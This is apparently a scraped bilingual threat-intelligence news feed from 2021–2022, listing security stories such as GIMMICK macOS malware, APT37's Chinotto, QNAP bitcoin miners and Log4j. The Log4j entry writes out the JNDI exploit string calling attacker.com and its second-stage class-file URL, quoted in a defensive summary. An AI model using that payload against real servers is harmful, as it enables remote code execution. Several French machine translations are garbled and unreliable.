What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-03-22 16:12:11 | Storm Cloud à l'horizon: Gimmick malware frappe à MacOS Storm Cloud on the Horizon: GIMMICK Malware Strikes at macOS (lien direct) |
> Fin 2021, Volexity a découvert une intrusion dans un environnement surveillé dans le cadre de son service de surveillance de la sécurité du réseau.La volexité a détecté un système exécutant FRP, autrement connu sous le nom de proxy inverse rapide, et a ensuite détecté le balayage de port interne peu de temps après.Ce trafic a été déterminé comme non autorisé et le système, un MacBook Pro exécutant MacOS 11.6 (Big Sur), a été isolé pour une analyse médico-légale supplémentaire.Volexity a pu exécuter la surtension Collect pour acquérir la mémoire du système (RAM) et sélectionner les fichiers d'intérêt dans la machine pour l'analyse.Cela a conduit à la découverte d'une variante macOS d'un gadget d'appels de volexité d'implant de logiciels malveillants.La volexité a rencontré des versions Windows de la famille des logiciels malveillants à plusieurs reprises.Gimmick est utilisé dans les attaques ciblées de Storm Cloud, un acteur de menace d'espionnage chinois connue pour attaquer les organisations à travers l'Asie.Il s'agit d'une famille de logiciels malveillants multiplateforme riche en fonctionnalités qui utilise des services d'hébergement de cloud public (tels que Google [& # 8230;]
>In late 2021, Volexity discovered an intrusion in an environment monitored as part of its Network Security Monitoring service. Volexity detected a system running frp, otherwise known as fast reverse proxy, and subsequently detected internal port scanning shortly afterward. This traffic was determined to be unauthorized and the system, a MacBook Pro running macOS 11.6 (Big Sur), was isolated for further forensic analysis. Volexity was able to run Surge Collect to acquire system memory (RAM) and select files of interest from the machine for analysis. This led to the discovery of a macOS variant of a malware implant Volexity calls GIMMICK. Volexity has encountered Windows versions of the malware family on several previous occasions. GIMMICK is used in targeted attacks by Storm Cloud, a Chinese espionage threat actor known to attack organizations across Asia. It is a feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google […] |
Malware Threat Cloud | ★★★ | |
 |
2022-03-16 00:00:00 | Cybersécurité - la valeur et le besoin de formation pratique Cyber Security -The Value and Need for Practical Training (lien direct) |
Whenever we are trying to master a new skill, we have all heard about the importance of practise. The associated attention, rehearsal and repetition leads to the acquisition of new knowledge or skills that can later be developed into more complex skillsets. This sentiment has been seen throughout history, where some of the world\'s most masterful people have shared a similar philosophy that is still true today: Bruce Lee - “Practice makes perfect. After a long time of practising, our work will become natural, skillfull, swift and steady” Abraham Lincoln - “Give me six hours to chop down a tree and I will spend the first four sharpening the axe.” Japanese Proverb – “Tomorrow\'s battle is won during todays practice” Vincent Van Gough – “As practise makes perfect, I cannot but make progress, each drawing one makes, each study one paints is a step forward” Marshawn Lynch - “When you get to practice against the best, it brings the best out of you.” Martha Graham – “Practice means to perform, over and over again in the face of all obstacles, some act of vision, of faith, of desire. Practice is a means of inviting the perfection desired” Unknown - “Don\'t practise until you get it right, practice until you can\'t get it wrong” Others might disagree slightly: Vince Lombardi – “Practise does not make perfect. Only perfect practise makes perfect” So, the message is clear, to master a skill, we need to practise but we need to practise against the best and in the best most realistic possible environment. In terms of cybersecurity, as the cyber threat environment grows more intense, cyber defence groups require more and more skilled professionals to help with the onslaught of cyberattacks. However, they are finding it increasingly difficult to recruit and hire trained security professionals as having a degree in cybersecurity is usually not enough to give an individual the skills required for mitigating sophisticated attacks. For Cyber Security professionals, the required practise involves realistic breach scenarios or cyberattacks. These breaches or cyberattacks are any attempt to gain unauthorized access to a computer, computing system or computer network with the intent to cause damage. The aim to disable, disrupt, destroy or control computer systems or to alter, block, delete, manipulate or steal the data held within these systems. Day-to-day work in cybersecurity offers few opportunities for such training on the job, resulting in the required practise being an extremely difficult thing to achieve. When you think about it, cyberattacks are seemingly in the news every day, which seems to contradict my previous statement. However, the results of a cyberattack can range from causing inconvenience to dire consequences. A cyberattack on critical infrastructure and/or healthcare sectors don\'t just affect data or computer systems, they can wreak havoc in the physical world. This was seen all too well in Ireland in the not so distant past. So, cyberattacks are prevalent but the consequences mean we aim to prevent as many breaches as possible and reduce the impact, contain and eradicate any attack that exploits a system. There lies the problem, cyber security professionals require realistic breach scenarios and cyberattacks to train and become sufficiently skilled but cyber professionals are consistently working hard to prevent such attacks in the real-world. So the question is, “how do we train cyber security professionals to deal with the challenging ever-changing cyber environment?”. The answer is a Cyber Range! A Cyber Range provides a secure, sandboxed virtual interactive training environment that can simulate real-world feel scenarios and environments, including complex IT environments and attacks on IT infrastructure, networks, software platforms and applications. As a result, a cyber range infrastructure provides the required training and practise elements of realistic breach scenarios and cyberattacks. A Cyber Range enables students to practice newly acquire | Tool Threat Studies Mobile Industrial Medical Cloud | ★★ | |
 |
2022-03-09 18:00:00 | FedRamp Ready: La dernière désignation de Mandiant \\ prend en charge les clients du secteur public FedRAMP Ready: Mandiant\\'s Latest Designation Supports Public Sector Customers (lien direct) |
Dans une autre étape importante dans sa mission pour que chaque organisation soit sécurisée des cyber-menaces, Mandiant a récemment annoncé qu'il avait obtenu la désignation FedRamp Ready pour sa première solution évaluée, Mandiant Advantage Défense automatisée .Atteignant la préparation à Le niveau d'impact élevé, la défense automatisée est désormais disponible dans le FedRamp Marketplace En tant qu'offre de services cloud (CSO), permettant aux agences fédérales de profiter de ses capacités de détection, de priorisation et de réponse accélérées.
Qu'est-ce que FedRamp?
Fedramp est un Programme du gouvernement qui favorise l'adoption de
In yet another major milestone in its mission to make every organization secure from cyber threats, Mandiant recently announced that it achieved FedRAMP Ready designation for its first evaluated solution, Mandiant Advantage Automated Defense. Achieving readiness at the High impact level, Automated Defense is now available in the FedRAMP Marketplace as a Cloud Service Offering (CSO), allowing federal agencies to take advantage of its accelerated threat detection, prioritization and response capabilities. What is FedRAMP? FedRAMP is a government-wide program that promotes the adoption of |
Threat Cloud | ★★★ | |
|
2022-02-10 00:00:00 | Cyber Security & # 8211;Une guerre de Troie où nous gagnons Cyber Security – A Trojan War where we win (lien direct) |
Written by Dr. Anila Mjeda, Cyber Skills Lecturer In Ancient Greek literature, Troy is portrayed as a powerful kingdom of the Heroic Age. Troy\'s ability to withstand battles and attacks was due to the strength of its walls which, legend has it, were built by Greek gods, Poseidon and Apollo. This was all the more evident when Troy \'fell\' after it\'s supposed, impenetrable outer perimeter, got breached. This lesson from Greek Mythology echoes ever true in today\'s software systems. Our Cyber Security mechanisms must be approached in a manner called \'Defence-in-depth”, where a number of defence mechanisms are layered to offer better protection to the system. (Imagine the medieval castles\' layers of fine battlements, towers, and \'high\' and \'steep\' walls.) What is most vital in Cyber Security, is the inner most layer of a strong, defence-in-depth. This layer should start with secure coding which is a concept we call \'Shifting Left\'. Shifting Left Shifting left, in essence means incorporating security at the beginning of a project, such as data collecting, and incorporating security activities in each of the stages of the software development lifecycle. The shifting left metaphor stems from the fact that people whose native language is written from left to right, tend to perceive left (think of the outmost left on a page) as the place where one begins their work. As a developer, will your application need to handle credit card data? Will the users of your application be allowed to upload their own files to the system, and which third-party components will you be using in the system? These are but a fraction of the security considerations to be analysed from the beginning of any project. Today\'s software systems are inherently interconnected, and we cannot simply draw up the bridge and defend our systems medieval style. Software systems use libraries, APIs, microservices and in general a variety of components that translate to an end-product. There are complex dependencies, many of which to third-party software. Furthermore, modern approaches such as Continuous Integration / Continuous Deployment (CI/CD) pipelines, Infrastructure as Code (IaC), Security as Code (SaC), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) push more functionality into the software domain. This blurring of the boundaries means that security is not the job of only the security professionals and calls for the development team to play a crucial role in it. Software developers are talented and inventive creators and as cyber-attacks increase in numbers and severity, it is vital they collaborate closely with the security professionals and get the proper training to interweave security into their creations. While proper training of developers is the real answer to prevent vulnerabilities creeping up into our apps, if I were to start from one element, it would be the mentality of Zero-Trust. While I do not recommend it as a mentality for life, I do very much recommend it in all thing\'s cybersecurity. The Zero-Trust concept extends from infrastructure to software. In fact, one aspect of our software which if we do right, would solve most of our security woes is zero-trusting all inputs. Zero-Trust Your Inputs Language purists might forgive this conversion of zero-trust into a verb, on the grounds that placing no trust on all inputs (even when they come from your own system), would help us mitigate most of our security troubles. You may be asking, “Why don\'t we just do it then, and “solve” security once and for all?”. Part of the difficulty relies on identifying every single input. Did we identify all the cloud workflows that can trigger our serverless functions? Are there any unforeseen ways into our database (Hello injection vulnerabilities)? Can an attacker give instructions to the server and resultantly gain access they should not have (Server-Side Request Forgery (SSRF) vulnerabilities)? Can our web-based system be commandeered to attack our legitimate users (Cross Site Scripting (XSS) v | Vulnerability Cloud | ★★ | |
|
2022-02-02 13:00:00 | Annonçant la gestion de la surface d'attaque mandiante avantage Announcing Mandiant Advantage Attack Surface Management (lien direct) |
Vous voulez sauter maintenant?Commencez avec Mandiant Advantage Attack Surface Management En créant votre Free Account aujourd'hui!
Alors que les organisations continuent de numériser leur entreprise et que les employés sont autorisés à tirer parti de ces capacités, il n'est pas étonnant que les équipes de sécurité aient du mal à garder une trace des infrastructures, des applications, des services cloud et du saasSeul s'assurer que les politiques de sécurité sont respectées dans ces environnements.La surface d'attaque est considérablement et largement en expansion, et sans l'automatisation appropriée, il est peu probable que les équipes de sécurité aient la visibilité, le contrôle et
Want to jump in now? Get started with Mandiant Advantage Attack Surface Management by creating your free account today! As organizations continue to digitize their business and employees are empowered to leverage these capabilities, it\'s no wonder security teams struggle to keep track of infrastructure, applications, cloud services and SaaS usage-let alone ensure security policies are adhered to across these environments. The attack surface is dramatically and vastly expanding, and without the proper automation, it is unlikely that security teams will have the visibility, control, and |
Cloud | ★★ | |
 |
2022-01-19 00:00:00 | Quelles tendances émergentes de cybersécurité devraient-elles être conscientes? Alors que le monde devient plus connecté numériquement, les entreprises doivent être conscientes des risques croissants de cybersécurité. What Emerging Cybersecurity Trends Should Enterprises Be Aware Of?As the world becomes more digitally connected, enterprises need to be aware of the growing cybersecurity risks.Read More (lien direct) |
As the world becomes more digitally connected every year â and with the pandemic further accelerating digital transformation â all types of enterprises need to be aware of the growing cybersecurity risks that come with this shift. In Europe, for example, significant attacks on critical sectors more than doubled in 2020 compared to 2019, according to data from the European Union Agency for Cybersecurity, as reported by CNN. In 2021, the picture arguably became even bleaker around the world, with major ransomware attacks causing disruption to companies in industries ranging from energy to meat processing.In the first six months of 2021 alone, ransomware-related reported activity in the U.S. had a higher total value ($590 million) than all ransomware-related reported suspicious activity in the U.S. in 2020, according to the U.S. Department of Treasury\'s Financial Crimes Enforcement Network (FinCEN). The total number of suspicious events filed in the first six months of 2021 in the U.S. also exceeded all of what occurred in the country in 2020 by 30%, the agency reports. Yet itâs not just ransomware thatâs wreaking havoc. Enterprises also need to be prepared for cyber threats like denial of service (DoS) attacks, where a flood of network activity can interrupt servers, thereby causing business interruption. Cisco predicts that distributed denial of service (DDoS) attacks (a subset of DoS, which involves using multiple devices to send a flood of traffic, as opposed to just using one device with a DoS attack) globally will roughly âdouble from 7.9 million in 2018 to 15.4 million by 2023.âIn addition to preparing for these types of cyberattacks, enterprises will also increasingly need to be aware of and comply with privacy-related regulations. As governments around the world try to bolster their cybersecurity responses, they are passing or at least considering new rules and guidance around how companies need to handle sensitive data and privacy issues. Amidst this preparation, enterprises also need to recognize that cybersecurity plans arenât foolproof, especially as attacks evolve. That means assets could be at risk even with solid defenses in place. So, enterprises increasingly need to think about not just how to prevent cyber attacks but also consider the dollar-value cost of risk, given that events will inevitably occur. This process, known as cyber risk quantification â a form of financial quantification â helps enterprises think about and discuss cyber risk in definitive business terms. Knowing how much money is at stake and how different cyber events could affect revenue and profit can help businesses prioritize defenses and take mitigating action like securing cyber insurance. In this report, weâll take a closer look at these emerging cybersecurity trends that enterprises should be aware of. Understanding these areas can help organizations potentially improve their risk management, both from a cybersecurity and overall governance standpoint. ââEvolving Ransomware RisksWhile ransomware is not a new type of threat, the scale and intensity of ransomware continue to broaden. Enterprises large and small, across all types of industries, need to be prepared for these cyber attacks.For one, ransomware-as-a-service, âwhere ransomware variants are licensed to individuals and accomplices to execute attacks,â as Reuters explains, has been on the rise. Based on suspicious activity reports, FinCEN identified 68 ransomware variants in the first half of 2021.âThe resulting emergence of new attackers has led to increased uncertainty and volatility for companies in responding to attacks due to the lack of information on the growing number of ransomware threat actors,â adds Reuters.Part of the problem is also that ransomware attacks arenât just being launched on an ad-hoc basis by individuals. Instead, thereâs in | Ransomware Tool Threat Prediction Cloud | ★★★ | |
 |
2022-01-14 13:36:57 | Campagne malware en cours exploitant des infrastructures de cloud public (lien direct) | Une campagne de malwares en cours a récemment été documentée par le groupe Talos de Cisco. Selon ses experts, elle exploite des infrastructures de cloud public, comme les services cloud AWS d'Amazon et Azure de Microsoft. À la vue de cette attaque, les cybercriminels optent désormais pour une infrastructure d'attaque entièrement dynamique, afin de contourner la distribution initiale et la détection d'accès. The post Campagne malware en cours exploitant des infrastructures de cloud public first appeared on UnderNews. | Malware Cloud | ||
 |
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-14 16:00:00 | Azure Run Command pour les nuls Azure Run Command for Dummies (lien direct) |
Dans le récent article de blog de Mandiant \\, nous avons détaillé Activité d'intrusion russe présumée qui cible les fournisseurs de services gérés (MSP) pour accéder à leurs clients CLUSIDE \\ '.D'autres sociétés, comme Microsoft, ont observé Activité ciblée de manière similaire contre les clients de plusieurs Cloud et fournisseurs de services gérés . Une technique notable de ces intrusions est l'utilisation de commandes Azure Run pour passer latéralement des hyperviseurs gérés aux clients MSP \\ 'sous-jacent sous-jacentmachines virtuelles.
Ce dernier article de blog est une annexe supplémentaire pour mettre en surbrillance les commandes Azure Run et fournir
In Mandiant\'s recent blog post, we detailed suspected Russian intrusion activity that targeted managed services providers (MSP) to gain access to their customers\' cloud environments. Other companies, such as Microsoft, have observed similarly targeted activity against customers of several cloud and managed service providers. One notable technique from these intrusions is the use of Azure Run Commands to move laterally from managed hypervisors to the MSP customers\' underlying virtual machines. This latest blog post comes as a supplementary annex to highlight Azure Run Commands and provide |
Cloud | ★★ | |
 |
2021-12-07 22:33:02 | Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices (lien direct) | Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the | Malware Cloud | APT 37 | |
|
2021-12-07 16:04:00 | Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New Malware Hides as Legit Nginx Process on E-Commerce Servers
(published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Are Enabling A New Legion Of Pro Phishers
(published: December 2, 2021)
Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested.
Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
Tags: Phishing, XBATLI
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
(pub |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 37 | ★★★★ |
 |
2021-12-07 15:28:27 | Bitcoin Miner [oom_reaper] targets QNAP NAS devices (lien direct) | Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices, the miner will create a new process named [oom_reaper] that allows threat actors to mine Bitcoin The above process could occupy […] | Threat Cloud | APT 37 | |
 |
2021-11-30 12:24:19 | North Korean Hackers Use New \'Chinotto\' Malware to Target Windows, Android Devices (lien direct) | Kaspersky has analyzed a new espionage campaign conducted by the threat actor named ScarCruft, and the security firm's researchers have uncovered a previously unknown malware that has been used to target Windows and Android devices. | Malware Threat Cloud | APT 37 | |
 |
2021-11-30 11:24:48 | Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (lien direct) | FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that utilizes the stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim.The victim was socially engineered and compelled into opening rar zipped attachments purporting to be from the trusted sender that contained a malicious Word document. The Word document is multi stage in design, and uses a malicious macro to initiate the first stage. The first stage detects the presence of AV software, and if AV is not present will initiate the second stage which is a shellcode that will download the final third stage payload.Ultimately, after several months of dwelling undetected on the infected system, the backdoor will then download the multiplatform infostealer, "Chinotto." Windows variants were sent via spearphishing emails and Android variants were sent via SMShing texts.What Operating Systems are Affected?Chinoto targets Windows and Android based operating systems.Is This Limited to Targeted Attacks?Yes.How Serious of an Issue is This?Medium.What is APT37?APT37 (also known as GROUP123 and Scarcruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed to the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea.APT37 is famous for exploiting vulnerabilities in the Hangul Word Processor (HWP) which is commonly used in South Korea, especially by those in the government sector. Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at their disposal that targets various verticals and organizations with specially crafted campaigns. Other vectors besides the Adobe and Hangul vulnerabilities observed were the usage of Microsoft vulnerabilities as well, specifically CVE-2017-0199 (Microsoft Office UAC bypass) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS). For further details on the exploitation of HWP documents and campaigns previously analyzed, please refer to our blog here.What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:VBA/Agent.AAK!trW32/PossibleThreatVBA/Agent.AF3C!trW32/Agent.ACDD!trPossibleThreat.MUPossibleThreat.PALLAS.HW32/FRS.VSNTGF20!trW32/Bsymem.MSJ!trAll network IOCs are blocked by the WebFiltering client.Any Other Suggested Mitigation?Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc. it is important to keep all AV and IPS signatures up to date.It is also important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk.Also, as this campaign was sent via spearphishing and smsshing - organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing/smishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing/spearphishing/smishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Si | Malware Threat Patching Cloud | APT 37 | |
 |
2021-11-29 10:00:31 | ScarCruft surveilling North Korean defectors and human rights activists (lien direct) | The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor. Recently, we had an opportunity to perform a deeper investigation on a host compromised by this group. | Cloud | APT 37 | |
 |
2021-11-29 08:43:29 | APT37 targets journalists with Chinotto multi-platform malware (lien direct) | North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices. [...] | Malware Cloud | APT 37 | |
|
2021-11-29 05:14:10 | New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists (lien direct) | North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly-targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper | Threat Cloud | APT 37 APT 37 | |
|
2021-11-19 15:14:40 | North Korea-linked TA406 cyberespionage group activity in 2021 (lien direct) | North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, and Konni, Black Banshee, Velvet Chollima) has intensified its operations in 2021. The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October […] | Cloud | APT 37 | |
 |
2021-11-10 14:11:03 | North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets (lien direct) |
By Jung soo An and Asheer Malhotra, with contributions from Kendall McKay.
Cisco Talos has observed a new malware campaign operated by the Kimsuky APT group since June 2021.Kimsuky, also known as Thallium and Black Banshee, is a North Korean state-sponsored advanced...
[[ This is only the beginning! Please visit the blog for the complete entry ]] |
Malware Cloud | APT 37 | |
|
2021-11-02 08:01:01 | Mandiant Data Science présente la dernière recherche sur l'apprentissage de la machine de sécurité à Camlis \\ '21 Mandiant Data Science Showcases Latest Security Machine Learning Research at CAMLIS \\'21 (lien direct) |
La mission de l'équipe de science des données mandialiants (MDS) est de développer des solutions d'apprentissage automatique innovantes qui appliquent l'expertise unique et l'intelligence des menaces de Maniant \\ à l'échelle pour nos clients.MDS est impliqué dans de nombreux projets divers dispensés dans le cadre de la Mandiant Advantage SaaS Platform, mais nous présentons égalementet publier des recherches de pointe à l'intersection de la sécurité et de l'apprentissage automatique lors des principales conférences de l'industrie et des universitaires.Nous sommes fiers d'annoncer que notre équipe a récemment eu quatre conférences acceptées au Conférence sur l'apprentissage appliqué en matière de sécurité de l'information (CAMLIS)
The Mandiant Data Science (MDS) team\'s mission is to develop innovative machine learning solutions that apply Mandiant\'s unique expertise and threat intelligence at scale for our customers. MDS is involved in many diverse projects delivered as part of the Mandiant Advantage SaaS platform, but we also present and publish cutting-edge research at the intersection of security and machine learning at leading industry and academic conferences. We are proud to announce that our team recently had four talks accepted at the Conference on Applied Machine Learning in Information Security (CAMLIS) |
Threat Cloud | ★★★ | |
|
2021-11-01 00:00:00 | Cyber Skills - ce que vous devez savoir Cyber Skills - What You Need to Know (lien direct) |
Cyber Skills – Building Ireland Cyber Security Skills
Cyber Skills is national programme funded by the Higher Education Authority Pillar 3 Human Capital Initiative. In collaboration with Munster Technological University, University College Dublin, Technological University Dublin, and University of Limerick we are committed to addressing the skill shortage in Cyber Security.
We provide online, fully flexible university accredited micro-credentials and pathways. We empower the learner by offering a wide range of modules or specifically designed courses all of which have been aligned to the NIST NICE Cyber Security framework. As a Cyber Skills graduate you will be workplace ready with the skills and knowledge needed to advance in your career.
Micro-Credentials
A micro-credential is a short, accredited module of learning. Cyber Skills micro-credentials are 5-10 credits and can be used towards a major award. We offer the control and flexibility to choose the micro-credentials you need to build your own training programme.
To view our micro-credentials, click here
Pathways
Choose a pathway that has been specially designed in close collaboration with industry based on the needs of the workplace. Our pathways consist of micro-credentials which are tailored to a specific in-demand job roles needed by industry.
To view our pathways, click here
Why should I up-skill my team?
Cyber Security is now a priority for every business across all industries. A high percentage of cyber-attacks come through a lack of knowledge. Managers can no longer solely rely on cyber security software; but invest in staff education to identify a cyber threat and the upskilling needed to prevent it. By educating your staff through Cyber Skills you are ensuring that they can protect and recover computer systems, devices, programs and networks from any type of cyber-attack.
Why should I up-skill?
Cyber Security is the fastest growing, in-demand field of ICT and there is a significant shortage of skills in this sector globally. Therefore, with cybersecurity qualifications your skillset is among the most sought after in organisations. Become part of a highly dynamic industry and know that your role is playing an important part in society today.
Why Choose Cyber Skills
“We are committed to empowering the individual in order to eradicate cyber vulnerability.”
Cyber Skills is the only place where you can find a course that has been specifically designed and created by industry and academia experts. Working closely with our industry partners Dell and MasterCard we have designed courses informed by the needs of the workplace to enhance the skills of networking and software development professionals. Our lecturers come from multi-disciplinary backgrounds, with a passion for cybersecurity. Combining years of experience and with expert knowledge our lecturers enable students to achieve their goals.
Cyber Range
Cyber Skills benefits from the first of its kind world class cloud based Cyber Range. The Cyber Range provides a secure, sandboxed area which simulates real-world feel scenarios and environments where students can test their new skills. Labs and assignments will be used to reinforce the content from the lectures. A full range of scenarios will provide the opportunity to test the vast array of techniques required to keep ahead in this challenging ever-changing environment.
Recognition of Prior Learning
Candidates who have gained relevant knowledge and skills through informal study or experiential means can apply for Cyber Skills Pathways and Micro-Credentials. We will discuss with an applicant their experiences to ensure our courses will be of benefit to their career.
Cyber Skills – Building Ireland Cyber Security Skills Cyber Skills is national programme funded by the Higher Education Authority Pillar 3 Human Capital Initiative. In collaboration with Munster Technological University, University College Dublin, Technological University Dublin, and University of Limerick we are committed to addressing t |
Vulnerability Threat Studies Cloud | ★★ | |
|
2021-08-24 17:11:00 | Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit
(published: August 23, 2021)
Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks.
